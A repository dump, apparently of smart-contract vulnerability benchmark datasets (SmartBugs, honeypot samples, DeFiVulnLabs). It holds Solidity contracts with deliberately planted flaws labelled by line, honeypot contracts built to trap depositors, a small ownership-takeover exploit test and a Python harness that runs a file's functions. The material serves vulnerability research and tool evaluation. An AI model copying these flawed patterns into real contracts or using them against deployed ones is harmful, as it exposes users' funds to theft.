initialized = 0; 14 | uint256 public count = 1; 15 | 16 | function init() public { 17 | initialized = 1; 18 | } 19 | 20 | function run(uint256 input) { 21 | if (initialized == 0) { 22 | return; 23 | } 24 | // ARITHMETIC 25 | count -= input; 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/etherbank.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/seresistvanandras/EthBench/blob/master/Benchmark/Simple/reentrant.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 21 5 | */ 6 | 7 | pragma solidity ^0.4.0; 8 | contract EtherBank{ 9 | mapping (address => uint) userBalances; 10 | function getBalance(address user) constant returns(uint) { 11 | return userBalances[user]; 12 | } 13 | 14 | function addToBalance() { 15 | userBalances[msg.sender] += msg.value; 16 | } 17 | 18 | function withdrawBalance() { 19 | uint amountToWithdraw = userBalances[msg.sender]; 20 | // REENTRANCY 21 | if (!(msg.sender.call.value(amountToWithdraw)())) { throw; } 22 | userBalances[msg.sender] = 0; 23 | } 24 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/reentrancy_insecure.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://consensys.github.io/smart-contract-best-practices/known_attacks/ 3 | * @author: consensys 4 | * @vulnerable_at_lines: 17 5 | */ 6 | 7 | pragma solidity ^0.5.0; 8 | 9 | contract Reentrancy_insecure { 10 | 11 | // INSECURE 12 | mapping (address => uint) private userBalances; 13 | 14 | function withdrawBalance() public { 15 | uint amountToWithdraw = userBalances[msg.sender]; 16 | // REENTRANCY 17 | (bool success, ) = msg.sender.call.value(amountToWithdraw)(""); // At this point, the caller's code is executed, and can call withdrawBalance again 18 | require(success); 19 | userBalances[msg.sender] = 0; 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x524960d55174d912768678d8c606b4d50b79d7b1.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 21 5 | */ 6 | 7 | pragma solidity ^0.4.13; 8 | 9 | contract Centra4 { 10 | 11 | function transfer() returns (bool) { 12 | address contract_address; 13 | contract_address = 0x96a65609a7b84e8842732deb08f56c3e21ac6f8a; 14 | address c1; 15 | address c2; 16 | uint256 k; 17 | k = 1; 18 | 19 | c2 = 0xaa27f8c1160886aacba64b2319d8d5469ef2af79; 20 | // UNCHECKED_LL_CALLS 21 | contract_address.call("register", "CentraToken"); 22 | if(!contract_address.call(bytes4(keccak256("transfer(address,uint256)")),c2,k)) return false; 23 | 24 | return true; 25 | } 26 | 27 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/incorrect_constructor_name2.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-118#incorrect-constructor-name1sol 3 | * @author: Ben Perez 4 | * @vulnerable_at_lines: 18 5 | */ 6 | 7 | 8 | pragma solidity ^0.4.24; 9 | 10 | contract Missing{ 11 | address private owner; 12 | 13 | modifier onlyowner { 14 | require(msg.sender==owner); 15 | _; 16 | } 17 | // ACCESS_CONTROL 18 | function missing() 19 | public 20 | { 21 | owner = msg.sender; 22 | } 23 | 24 | function () payable {} 25 | 26 | function withdraw() 27 | public 28 | onlyowner 29 | { 30 | owner.transfer(this.balance); 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/incorrect_constructor_name3.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-118#incorrect-constructor-name2sol 3 | * @author: Ben Perez 4 | * @vulnerable_at_lines: 17 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | contract Missing{ 10 | address private owner; 11 | 12 | modifier onlyowner { 13 | require(msg.sender==owner); 14 | _; 15 | } 16 | // ACCESS_CONTROL 17 | function Constructor() 18 | public 19 | { 20 | owner = msg.sender; 21 | } 22 | 23 | function () payable {} 24 | 25 | function withdraw() 26 | public 27 | onlyowner 28 | { 29 | owner.transfer(this.balance); 30 | } 31 | 32 | } 33 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/integer_overflow_1.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/trailofbits/not-so-smart-contracts/blob/master/integer_overflow/integer_overflow_1.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 14 5 | */ 6 | 7 | pragma solidity ^0.4.15; 8 | 9 | contract Overflow { 10 | uint private sellerBalance=0; 11 | 12 | function add(uint value) returns (bool){ 13 | // ARITHMETIC 14 | sellerBalance += value; // possible overflow 15 | 16 | // possible auditor assert 17 | // assert(sellerBalance >= value); 18 | } 19 | 20 | // function safe_add(uint value) returns (bool){ 21 | // require(value + sellerBalance >= sellerBalance); 22 | // sellerBalance += value; 23 | // } 24 | } 25 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/denial_of_service/dos_simple.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/SmartContractSecurity/SWC-registry/blob/master/test_cases/dos_gas_limit/dos_simple.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 17,18 5 | */ 6 | 7 | 8 | pragma solidity ^0.4.25; 9 | 10 | contract DosOneFunc { 11 | 12 | address[] listAddresses; 13 | 14 | function ifillArray() public returns (bool){ 15 | if(listAddresses.length<1500) { 16 | // DENIAL_OF_SERVICE 17 | for(uint i=0;i<350;i++) { 18 | listAddresses.push(msg.sender); 19 | } 20 | return true; 21 | 22 | } else { 23 | listAddresses = new address[](0); 24 | return false; 25 | } 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/lotto.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/sigp/solidity-security-blog 3 | * @author: Suhabe Bugrara 4 | * @vulnerable_at_lines: 20,27 5 | */ 6 | 7 | pragma solidity ^0.4.18; 8 | 9 | contract Lotto { 10 | 11 | bool public payedOut = false; 12 | address public winner; 13 | uint public winAmount; 14 | 15 | // ... extra functionality here 16 | 17 | function sendToWinner() public { 18 | require(!payedOut); 19 | // UNCHECKED_LL_CALLS 20 | winner.send(winAmount); 21 | payedOut = true; 22 | } 23 | 24 | function withdrawLeftOver() public { 25 | require(payedOut); 26 | // UNCHECKED_LL_CALLS 27 | msg.sender.send(this.balance); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/reentrancy_dao.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/ConsenSys/evm-analyzer-benchmark-suite 3 | * @author: Suhabe Bugrara 4 | * @vulnerable_at_lines: 18 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | 9 | contract ReentrancyDAO { 10 | mapping (address => uint) credit; 11 | uint balance; 12 | 13 | function withdrawAll() public { 14 | uint oCredit = credit[msg.sender]; 15 | if (oCredit > 0) { 16 | balance -= oCredit; 17 | // REENTRANCY 18 | bool callResult = msg.sender.call.value(oCredit)(); 19 | require (callResult); 20 | credit[msg.sender] = 0; 21 | } 22 | } 23 | 24 | function deposit() public payable { 25 | credit[msg.sender] += msg.value; 26 | balance += msg.value; 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 25 5 | */ 6 | 7 | pragma solidity ^0.4.23; 8 | 9 | /* 10 | !!! THIS CONTRACT IS EXPLOITABLE AND FOR EDUCATIONAL PURPOSES ONLY !!! 11 | 12 | This smart contract allows a user to (insecurely) store funds 13 | in this smart contract and withdraw them at any later point in time 14 | */ 15 | 16 | contract keepMyEther { 17 | mapping(address => uint256) public balances; 18 | 19 | function () payable public { 20 | balances[msg.sender] += msg.value; 21 | } 22 | 23 | function withdraw() public { 24 | // UNCHECKED_LL_CALLS 25 | msg.sender.call.value(balances[msg.sender])(); 26 | balances[msg.sender] = 0; 27 | } 28 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/time_manipulation/roulette.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/sigp/solidity-security-blog 3 | * @author: - 4 | * @vulnerable_at_lines: 18,20 5 | */ 6 | 7 | pragma solidity ^0.4.25; 8 | 9 | contract Roulette { 10 | uint public pastBlockTime; // Forces one bet per block 11 | 12 | constructor() public payable {} // initially fund contract 13 | 14 | // fallback function used to make a bet 15 | function () public payable { 16 | require(msg.value == 10 ether); // must send 10 ether to play 17 | // TIME_MANIPULATION 18 | require(now != pastBlockTime); // only 1 transaction per block 19 | // TIME_MANIPULATION 20 | pastBlockTime = now; 21 | if(now % 15 == 0) { // winner 22 | msg.sender.transfer(this.balance); 23 | } 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /datasets/Solidlity-Vulnerable/honeypots/PINCODE.sol: -------------------------------------------------------------------------------- 1 | //https://etherscan.io/address/0x35c3034556b81132e682db2f879e6f30721b847c 2 | 3 | pragma solidity ^0.4.19; 4 | contract PinCodeEtherStorage { 5 | // Store some money with a 4 digit code 6 | 7 | address private Owner = msg.sender; 8 | uint public PinCode = 2658; 9 | 10 | function() public payable {} 11 | function PinCodeEtherStorage() public payable {} 12 | 13 | function Withdraw() public { 14 | require(msg.sender == Owner); 15 | Owner.transfer(this.balance); 16 | } 17 | 18 | function Take(uint n) public payable { 19 | if(msg.value >= this.balance && msg.value > 0.1 ether) 20 | // To prevent random guesses, you have to send some money 21 | // Random Guess = money lost 22 | if(n <= 9999 && n == PinCode) 23 | msg.sender.transfer(this.balance+msg.value); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /datasets/DeFiVulnLabs/src/test/Visibility.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.15; 3 | 4 | import "forge-std/Test.sol"; 5 | 6 | contract ContractTest is Test { 7 | ownerGame ownerGameContract; 8 | 9 | function testVisibility() public { 10 | 11 | ownerGameContract = new ownerGame(); 12 | console.log("Before exploiting, owner of ownerGame:",ownerGameContract.owner()); 13 | ownerGameContract.changeOwner(msg.sender); 14 | console.log("After exploiting, owner of ownerGame:",ownerGameContract.owner()); 15 | console.log("Exploit completed"); 16 | 17 | } 18 | receive() payable external{} 19 | } 20 | contract ownerGame{ 21 | address public owner; 22 | 23 | constructor() { 24 | owner = msg.sender; 25 | } 26 | 27 | function changeOwner(address _new) public { //vulnerable point 28 | owner = _new; 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x4a66ad0bca2d700f11e1f2fc2c106f7d3264504c.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 19 5 | */ 6 | 7 | pragma solidity ^0.4.18; 8 | 9 | contract EBU{ 10 | address public from = 0x9797055B68C5DadDE6b3c7d5D80C9CFE2eecE6c9; 11 | address public caddress = 0x1f844685f7Bf86eFcc0e74D8642c54A257111923; 12 | 13 | function transfer(address[] _tos,uint[] v)public returns (bool){ 14 | require(msg.sender == 0x9797055B68C5DadDE6b3c7d5D80C9CFE2eecE6c9); 15 | require(_tos.length > 0); 16 | bytes4 id=bytes4(keccak256("transferFrom(address,address,uint256)")); 17 | for(uint i=0;i<_tos.length;i++){ 18 | // UNCHECKED_LL_CALLS 19 | caddress.call(id,from,_tos[i],v[i]*1000000000000000000); 20 | } 21 | return true; 22 | } 23 | } -------------------------------------------------------------------------------- /datasets/Solidlity-Vulnerable/honeypots/Multiplicator.sol: -------------------------------------------------------------------------------- 1 | // https://etherscan.io/address/0x5aa88d2901c68fda244f1d0584400368d2c8e739 2 | 3 | pragma solidity ^0.4.18; 4 | 5 | contract MultiplicatorX3 6 | { 7 | address public Owner = msg.sender; 8 | 9 | function() public payable{} 10 | 11 | function withdraw() 12 | payable 13 | public 14 | { 15 | require(msg.sender == Owner); 16 | Owner.transfer(this.balance); 17 | } 18 | 19 | function Command(address adr,bytes data) 20 | payable 21 | public 22 | { 23 | require(msg.sender == Owner); 24 | adr.call.value(msg.value)(data); 25 | } 26 | 27 | function multiplicate(address adr) 28 | public 29 | payable 30 | { 31 | if(msg.value>=this.balance) 32 | { 33 | adr.transfer(this.balance+msg.value); 34 | } 35 | } 36 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/token.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/sigp/solidity-security-blog 3 | * @author: Steve Marx 4 | * @vulnerable_at_lines: 20,22 5 | */ 6 | 7 | pragma solidity ^0.4.18; 8 | 9 | contract Token { 10 | 11 | mapping(address => uint) balances; 12 | uint public totalSupply; 13 | 14 | function Token(uint _initialSupply) { 15 | balances[msg.sender] = totalSupply = _initialSupply; 16 | } 17 | 18 | function transfer(address _to, uint _value) public returns (bool) { 19 | // ARITHMETIC 20 | require(balances[msg.sender] - _value >= 0); 21 | // ARITHMETIC 22 | balances[msg.sender] -= _value; 23 | balances[_to] += _value; 24 | return true; 25 | } 26 | 27 | function balanceOf(address _owner) public constant returns (uint balance) { 28 | return balances[_owner]; 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/reentrance.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://ethernaut.zeppelin.solutions/level/0xf70706db003e94cfe4b5e27ffd891d5c81b39488 3 | * @author: Alejandro Santander 4 | * @vulnerable_at_lines: 24 5 | */ 6 | 7 | pragma solidity ^0.4.18; 8 | 9 | contract Reentrance { 10 | 11 | mapping(address => uint) public balances; 12 | 13 | function donate(address _to) public payable { 14 | balances[_to] += msg.value; 15 | } 16 | 17 | function balanceOf(address _who) public view returns (uint balance) { 18 | return balances[_who]; 19 | } 20 | 21 | function withdraw(uint _amount) public { 22 | if(balances[msg.sender] >= _amount) { 23 | // REENTRANCY 24 | if(msg.sender.call.value(_amount)()) { 25 | _amount; 26 | } 27 | balances[msg.sender] -= _amount; 28 | } 29 | } 30 | 31 | function() public payable {} 32 | } 33 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/bad_randomness/guess_the_random_number.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://capturetheether.com/challenges/lotteries/guess-the-random-number/ 3 | * @author: Steve Marx 4 | * @vulnerable_at_lines: 15 5 | */ 6 | 7 | pragma solidity ^0.4.21; 8 | 9 | contract GuessTheRandomNumberChallenge { 10 | uint8 answer; 11 | 12 | function GuessTheRandomNumberChallenge() public payable { 13 | require(msg.value == 1 ether); 14 | // BAD_RANDOMNESS 15 | answer = uint8(keccak256(block.blockhash(block.number - 1), now)); 16 | } 17 | 18 | function isComplete() public view returns (bool) { 19 | return address(this).balance == 0; 20 | } 21 | 22 | function guess(uint8 n) public payable { 23 | require(msg.value == 1 ether); 24 | 25 | if (n == answer) { 26 | msg.sender.transfer(2 ether); 27 | } 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/incorrect_constructor_name1.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/trailofbits/not-so-smart-contracts/blob/master/wrong_constructor_name/incorrect_constructor.sol 3 | * @author: Ben Perez 4 | * @vulnerable_at_lines: 20 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | contract Missing{ 10 | address private owner; 11 | 12 | modifier onlyowner { 13 | require(msg.sender==owner); 14 | _; 15 | } 16 | 17 | // The name of the constructor should be Missing 18 | // Anyone can call the IamMissing once the contract is deployed 19 | // ACCESS_CONTROL 20 | function IamMissing() 21 | public 22 | { 23 | owner = msg.sender; 24 | } 25 | 26 | function () payable {} 27 | 28 | function withdraw() 29 | public 30 | onlyowner 31 | { 32 | owner.transfer(this.balance); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /polymer/analyzer_harness.py: -------------------------------------------------------------------------------- 1 | # Extracts all the top-level symbols from a python file & runs them 2 | import sys 3 | import imp 4 | import json 5 | r = dict() 6 | x = imp.load_source('*', sys.argv[1]) # TODO: replace with importlib 7 | 8 | 9 | def filter_res(x): 10 | if isinstance(x, dict): 11 | return {str(k): filter_res(v) for k, v in x.items()} 12 | if isinstance(x, (tuple,list,set)): 13 | return [filter_res(_) for _ in x] 14 | return str(x) 15 | 16 | 17 | for _ in dir(x): 18 | if _.startswith('_'): 19 | continue 20 | try: 21 | r[_] = {'runs': getattr(x, _)()} 22 | r[_] = filter_res(r[_]) 23 | with open(sys.argv[1] + '.run', 'w') as handle: 24 | handle.write(json.dumps(r)) 25 | except Exception as ex: 26 | r[_] = {'error': str(ex)} 27 | with open(sys.argv[1] + '.run', 'w') as handle: 28 | handle.write(json.dumps(r)) 29 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0xb37f18af15bafb869a065b61fc83cfc44ed9cc27.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 33 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | 10 | contract SimpleWallet { 11 | address public owner = msg.sender; 12 | uint public depositsCount; 13 | 14 | modifier onlyOwner { 15 | require(msg.sender == owner); 16 | _; 17 | } 18 | 19 | function() public payable { 20 | depositsCount++; 21 | } 22 | 23 | function withdrawAll() public onlyOwner { 24 | withdraw(address(this).balance); 25 | } 26 | 27 | function withdraw(uint _value) public onlyOwner { 28 | msg.sender.transfer(_value); 29 | } 30 | 31 | function sendMoney(address _target, uint _value) public onlyOwner { 32 | // UNCHECKED_LL_CALLS 33 | _target.call.value(_value)(); 34 | } 35 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/unprotected0.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/trailofbits/not-so-smart-contracts/blob/master/unprotected_function/Unprotected.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 25 5 | */ 6 | 7 | pragma solidity ^0.4.15; 8 | 9 | contract Unprotected{ 10 | address private owner; 11 | 12 | modifier onlyowner { 13 | require(msg.sender==owner); 14 | _; 15 | } 16 | 17 | function Unprotected() 18 | public 19 | { 20 | owner = msg.sender; 21 | } 22 | 23 | // This function should be protected 24 | // ACCESS_CONTROL 25 | function changeOwner(address _newOwner) 26 | public 27 | { 28 | owner = _newOwner; 29 | } 30 | 31 | /* 32 | function changeOwner_fixed(address _newOwner) 33 | public 34 | onlyowner 35 | { 36 | owner = _newOwner; 37 | } 38 | */ 39 | } 40 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/access_control/mapping_write.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-124#mapping-writesol 3 | * @author: Suhabe Bugrara 4 | * @vulnerable_at_lines: 20 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | //This code is derived from the Capture the Ether https://capturetheether.com/challenges/math/mapping/ 10 | 11 | contract Map { 12 | address public owner; 13 | uint256[] map; 14 | 15 | function set(uint256 key, uint256 value) public { 16 | if (map.length <= key) { 17 | map.length = key + 1; 18 | } 19 | // ACCESS_CONTROL 20 | map[key] = value; 21 | } 22 | 23 | function get(uint256 key) public view returns (uint256) { 24 | return map[key]; 25 | } 26 | function withdraw() public{ 27 | require(msg.sender == owner); 28 | msg.sender.transfer(address(this).balance); 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/reentrancy_simple.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/trailofbits/not-so-smart-contracts/blob/master/reentrancy/Reentrancy.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 24 5 | */ 6 | 7 | pragma solidity ^0.4.15; 8 | 9 | contract Reentrance { 10 | mapping (address => uint) userBalance; 11 | 12 | function getBalance(address u) constant returns(uint){ 13 | return userBalance[u]; 14 | } 15 | 16 | function addToBalance() payable{ 17 | userBalance[msg.sender] += msg.value; 18 | } 19 | 20 | function withdrawBalance(){ 21 | // send userBalance[msg.sender] ethers to msg.sender 22 | // if mgs.sender is a contract, it will call its fallback function 23 | // REENTRANCY 24 | if( ! (msg.sender.call.value(userBalance[msg.sender])() ) ){ 25 | throw; 26 | } 27 | userBalance[msg.sender] = 0; 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x610495793564aed0f9c7fc48dc4c7c9151d34fd6.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 33 5 | */ 6 | 7 | pragma solidity ^0.4.24; 8 | 9 | 10 | contract SimpleWallet { 11 | address public owner = msg.sender; 12 | uint public depositsCount; 13 | 14 | modifier onlyOwner { 15 | require(msg.sender == owner); 16 | _; 17 | } 18 | 19 | function() public payable { 20 | depositsCount++; 21 | } 22 | 23 | function withdrawAll() public onlyOwner { 24 | withdraw(address(this).balance); 25 | } 26 | 27 | function withdraw(uint _value) public onlyOwner { 28 | msg.sender.transfer(_value); 29 | } 30 | 31 | function sendMoney(address _target, uint _value, bytes _data) public onlyOwner { 32 | // UNCHECKED_LL_CALLS 33 | _target.call.value(_value)(_data); 34 | } 35 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/short_addresses/short_address_example.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://ericrafaloff.com/analyzing-the-erc20-short-address-attack/ 3 | * @author: - 4 | * @vulnerable_at_lines: 18 5 | */ 6 | 7 | pragma solidity ^0.4.11; 8 | 9 | contract MyToken { 10 | mapping (address => uint) balances; 11 | 12 | event Transfer(address indexed _from, address indexed _to, uint256 _value); 13 | 14 | function MyToken() { 15 | balances[tx.origin] = 10000; 16 | } 17 | // SHORT_ADDRESSES 18 | function sendCoin(address to, uint amount) returns(bool sufficient) { 19 | if (balances[msg.sender] < amount) return false; 20 | balances[msg.sender] -= amount; 21 | balances[to] += amount; 22 | Transfer(msg.sender, to, amount); 23 | return true; 24 | } 25 | 26 | function getBalance(address addr) constant returns(uint) { 27 | return balances[addr]; 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/denial_of_service/auction.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/trailofbits/not-so-smart-contracts/blob/master/denial_of_service/auction.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 23 5 | */ 6 | 7 | pragma solidity ^0.4.15; 8 | 9 | //Auction susceptible to DoS attack 10 | contract DosAuction { 11 | address currentFrontrunner; 12 | uint currentBid; 13 | 14 | //Takes in bid, refunding the frontrunner if they are outbid 15 | function bid() payable { 16 | require(msg.value > currentBid); 17 | 18 | //If the refund fails, the entire transaction reverts. 19 | //Therefore a frontrunner who always fails will win 20 | if (currentFrontrunner != 0) { 21 | //E.g. if recipients fallback function is just revert() 22 | // DENIAL_OF_SERVICE 23 | require(currentFrontrunner.send(currentBid)); 24 | } 25 | 26 | currentFrontrunner = msg.sender; 27 | currentBid = msg.value; 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/reentrancy/reentrancy_cross_function.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://consensys.github.io/smart-contract-best-practices/known_attacks/ 3 | * @author: consensys 4 | * @vulnerable_at_lines: 24 5 | */ 6 | 7 | pragma solidity ^0.4.0; 8 | 9 | contract Reentrancy_cross_function { 10 | 11 | // INSECURE 12 | mapping (address => uint) private userBalances; 13 | 14 | function transfer(address to, uint amount) { 15 | if (userBalances[msg.sender] >= amount) { 16 | userBalances[to] += amount; 17 | userBalances[msg.sender] -= amount; 18 | } 19 | } 20 | 21 | function withdrawBalance() public { 22 | uint amountToWithdraw = userBalances[msg.sender]; 23 | // REENTRANCY 24 | (bool success, ) = msg.sender.call.value(amountToWithdraw)(""); // At this point, the caller's code is executed, and can call transfer() 25 | require(success); 26 | userBalances[msg.sender] = 0; 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/front_running/eth_tx_order_dependence_minimal.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/ConsenSys/evm-analyzer-benchmark-suite 3 | * @author: Suhabe Bugrara 4 | * @vulnerable_at_lines: 23,31 5 | */ 6 | 7 | pragma solidity ^0.4.16; 8 | 9 | contract EthTxOrderDependenceMinimal { 10 | address public owner; 11 | bool public claimed; 12 | uint public reward; 13 | 14 | function EthTxOrderDependenceMinimal() public { 15 | owner = msg.sender; 16 | } 17 | 18 | function setReward() public payable { 19 | require (!claimed); 20 | 21 | require(msg.sender == owner); 22 | // FRONT_RUNNING 23 | owner.transfer(reward); 24 | reward = msg.value; 25 | } 26 | 27 | function claimReward(uint256 submission) { 28 | require (!claimed); 29 | require(submission < 10); 30 | // FRONT_RUNNING 31 | msg.sender.transfer(reward); 32 | claimed = true; 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x3e013fc32a54c4c5b6991ba539dcd0ec4355c859.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 29 5 | */ 6 | 7 | pragma solidity ^0.4.18; 8 | 9 | contract MultiplicatorX4 10 | { 11 | address public Owner = msg.sender; 12 | 13 | function() public payable{} 14 | 15 | function withdraw() 16 | payable 17 | public 18 | { 19 | require(msg.sender == Owner); 20 | Owner.transfer(this.balance); 21 | } 22 | 23 | function Command(address adr,bytes data) 24 | payable 25 | public 26 | { 27 | require(msg.sender == Owner); 28 | // UNCHECKED_LL_CALLS 29 | adr.call.value(msg.value)(data); 30 | } 31 | 32 | function multiplicate(address adr) 33 | public 34 | payable 35 | { 36 | if(msg.value>=this.balance) 37 | { 38 | adr.transfer(this.balance+msg.value); 39 | } 40 | } 41 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 27 5 | */ 6 | 7 | pragma solidity ^0.4.19; 8 | contract Token { 9 | function transfer(address _to, uint _value) returns (bool success); 10 | function balanceOf(address _owner) constant returns (uint balance); 11 | } 12 | contract EtherGet { 13 | address owner; 14 | function EtherGet() { 15 | owner = msg.sender; 16 | } 17 | function withdrawTokens(address tokenContract) public { 18 | Token tc = Token(tokenContract); 19 | tc.transfer(owner, tc.balanceOf(this)); 20 | } 21 | function withdrawEther() public { 22 | owner.transfer(this.balance); 23 | } 24 | function getTokens(uint num, address addr) public { 25 | for(uint i = 0; i < num; i++){ 26 | // UNCHECKED_LL_CALLS 27 | addr.call.value(0 wei)(); 28 | } 29 | } 30 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/unchecked_low_level_calls/0x5aa88d2901c68fda244f1d0584400368d2c8e739.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: etherscan.io 3 | * @author: - 4 | * @vulnerable_at_lines: 29 5 | */ 6 | 7 | pragma solidity ^0.4.18; 8 | 9 | contract MultiplicatorX3 10 | { 11 | address public Owner = msg.sender; 12 | 13 | function() public payable{} 14 | 15 | function withdraw() 16 | payable 17 | public 18 | { 19 | require(msg.sender == Owner); 20 | Owner.transfer(this.balance); 21 | } 22 | 23 | function Command(address adr,bytes data) 24 | payable 25 | public 26 | { 27 | require(msg.sender == Owner); 28 | // UNCHECKED_LL_CALLS 29 | adr.call.value(msg.value)(data); 30 | } 31 | 32 | function multiplicate(address adr) 33 | public 34 | payable 35 | { 36 | if(msg.value>=this.balance) 37 | { 38 | adr.transfer(this.balance+msg.value); 39 | } 40 | } 41 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/time_manipulation/lottopollo.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/seresistvanandras/EthBench/blob/master/Benchmark/Simple/timestampdependent.sol 3 | * @author: - 4 | * @vulnerable_at_lines: 13,27 5 | */ 6 | 7 | pragma solidity ^0.4.0; 8 | contract lottopollo { 9 | address leader; 10 | uint timestamp; 11 | function payOut(uint rand) internal { 12 | // TIME MANIPULATION 13 | if ( rand> 0 && now - rand > 24 hours ) { 14 | msg.sender.send( msg.value ); 15 | 16 | if ( this.balance > 0 ) { 17 | leader.send( this.balance ); 18 | } 19 | } 20 | else if ( msg.value >= 1 ether ) { 21 | leader = msg.sender; 22 | timestamp = rand; 23 | } 24 | } 25 | function randomGen() constant returns (uint randomNumber) { 26 | // TIME MANIPULATION 27 | return block.timestamp; 28 | } 29 | function draw(uint seed){ 30 | uint randomNumber=randomGen(); 31 | payOut(randomNumber); 32 | } 33 | } -------------------------------------------------------------------------------- /datasets/smartbugs/dataset/arithmetic/timelock.sol: -------------------------------------------------------------------------------- 1 | /* 2 | * @source: https://github.com/sigp/solidity-security-blog 3 | * @author: - 4 | * @vulnerable_at_lines: 22 5 | */ 6 | 7 | //added pragma version 8 | pragma solidity ^0.4.0; 9 | 10 | contract TimeLock { 11 | 12 | mapping(address => uint) public balances; 13 | mapping(address => uint) public lockTime; 14 | 15 | function deposit() public payable { 16 | balances[msg.sender] += msg.value; 17 | lockTime[msg.sender] = now + 1 weeks; 18 | } 19 | 20 | function increaseLockTime(uint _secondsToIncrease) public { 21 | // ARITHMETIC 22 | lockTime[msg.sender] += _secondsToIncrease; 23 | } 24 | 25 